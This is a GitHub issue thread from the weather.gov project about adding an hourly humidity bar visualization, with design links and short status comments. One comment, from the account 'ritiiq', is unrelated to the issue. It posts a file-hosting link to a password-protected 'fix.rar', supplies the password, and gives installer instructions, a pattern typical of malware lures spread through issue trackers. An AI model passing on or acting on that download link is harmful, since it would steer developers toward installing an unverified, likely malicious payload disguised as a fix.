### ISSUE TITLE
Visualization: Humidity, hourly, bar

### ISSUE THREAD

**Issue by colinmurphy01** [weather-gov/weather.gov#1638]
[Figma documentation](https://www.figma.com/design/w2QI2uTgaTWUPLHLi40mm1/Weather.gov-%E2%80%93-v0.2?node-id=11028-255552&m=dev&t=yrI9IMUri5KRaKev-1)

[In context](https://www.figma.com/design/w2QI2uTgaTWUPLHLi40mm1/Weather.gov-%E2%80%93-v0.2?node-id=10757-237625&t=yrI9IMUri5KRaKev-11)

Considerations:
- Blocked by #789 
- Implement within Hourly Details expansion for now, while we wait on #1616

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by colinmurphy01** [comment]
Is this something you'll still be able to get to or should we move this back into the backlog?

**Comment by partly-igor** [comment]
Not sure if it'll get merged in, but working on it
